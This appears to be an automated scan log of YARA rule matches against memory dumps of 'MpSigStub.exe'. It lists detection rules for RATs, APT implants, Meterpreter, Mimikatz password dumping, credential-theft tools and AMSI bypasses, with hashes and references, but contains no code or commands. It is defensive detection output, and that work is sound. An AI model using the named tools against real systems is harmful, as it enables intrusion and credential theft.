Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE Matched rule: Greenbug_Malware_4 date = 2017-01-25, hash2 = 82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9, author = Florian Roth, description = Detects ISMDoor Backdoor, reference = https://goo.gl/urp4CD, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f
Source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1c2da78e.83.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1c2d858a.84.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1a8daa72.66.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Gazer_logfile_name date = 30.08.2017, author = ESET, description = Detects Tura\'s Gazer malware, reference = https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: ROKRAT_Nov17_1 date = 2017-11-28, author = Florian Roth, description = Detects ROKRAT malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE Matched rule: gh0st author = https://github.com/jackcr/
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Gazer_logfile_name date = 30.08.2017, author = ESET, description = Detects Tura\'s Gazer malware, reference = https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: MAL_AirdViper_Sample_Apr18_1 date = 2018-05-04, hash1 = 9f453f1d5088bd17c60e812289b4bb0a734b7ad2ba5a536f5fd6d6ac3b8f3397, author = Florian Roth, description = Detects Arid Viper malware sample, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: ROKRAT_Nov17_1 date = 2017-11-28, author = Florian Roth, description = Detects ROKRAT malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: Gazer_logfile_name date = 30.08.2017, author = ESET, description = Detects Tura\'s Gazer malware, reference = https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
